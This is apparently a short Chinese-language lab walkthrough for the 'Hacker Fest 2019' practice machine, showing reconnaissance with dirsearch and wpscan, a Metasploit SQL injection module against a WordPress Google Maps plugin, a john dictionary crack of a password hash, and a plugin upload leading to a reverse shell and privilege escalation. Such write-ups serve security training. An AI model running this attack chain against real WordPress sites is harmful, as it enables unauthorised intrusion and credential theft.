靶機地址: https://www./entry/hacker-fest-2019,378/ 主機掃描:
FTP嘗試匿名登錄
應(yīng)該是WordPress的站點 進行目錄掃描: python3 dirsearch.py http://10.10.203.17/ -e html,json,php
此外還有一個phpmyadmin http://10.10.203.17/phpmyadmin/index.php 使用wpscan掃描檢測插件漏洞 wpscan --url http://10.10.203.17
msf5 > use auxiliary/admin/http/wp_google_maps_sqli msf5 auxiliary(admin/http/wp_google_maps_sqli) > set rhosts 10.10.203.17 msf5 auxiliary(admin/http/wp_google_maps_sqli) > exploit [*] 10.10.203.17:80 - Trying to retrieve the wp_users table...
密碼hash破解 john --wordlist=/usr/share/wordlists/rockyou.txt hash kittykat1
http://10.10.203.17/wp-admin/ 安裝ubh插件,進行上傳文件
本地監(jiān)聽,訪問反彈shell 這里有兩個思路: 1是通過webshell切換到webmaster用戶 2是直接通過遠程ssh登錄系統(tǒng)
進行提權(quán)
OVER!
|
|